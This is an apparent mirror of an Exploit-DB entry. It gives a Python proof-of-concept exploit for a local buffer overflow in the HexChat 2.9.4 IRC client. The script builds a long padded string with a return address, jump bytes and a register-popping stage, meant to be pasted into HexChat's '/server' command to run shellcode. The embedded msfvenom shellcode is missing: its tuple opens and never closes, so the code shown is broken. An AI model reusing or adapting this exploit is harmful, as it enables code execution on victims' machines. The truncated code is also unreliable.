HexChat 2.9.4 – Local Overflow

  • 作者: Matt Andreko
    日期: 2013-04-07
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/24919/
  • #!/usr/bin/python
    # HexChat 2.9.4 Local Exploit
    # Bug found by Jules Carter < @iMulitia >
    # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com >
    # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
    junk1 = "B"*30
    shellcode = (
    # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c
    junk2 = "A"*(13306-len(shellcode))
    stage1 = "\x4c\x4c\x77\x21" # 21 byte jump (JA)
    ret = "\x63\x64\x62\x68" # ASCII PPR
    junk3 = "C"*29
    stage2 = "\x61"*38 # POPAD x 38
    stage2 += "\x54" # PUSH ESP
    stage2 += "\xE9" # RETN # This byte is a bad char, but gets converted to RETN and \x88
    junk4 = "D"*11586
    print "Copy this text, and enter into HexChat's textbox: \"/server [string]\"" 
    print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4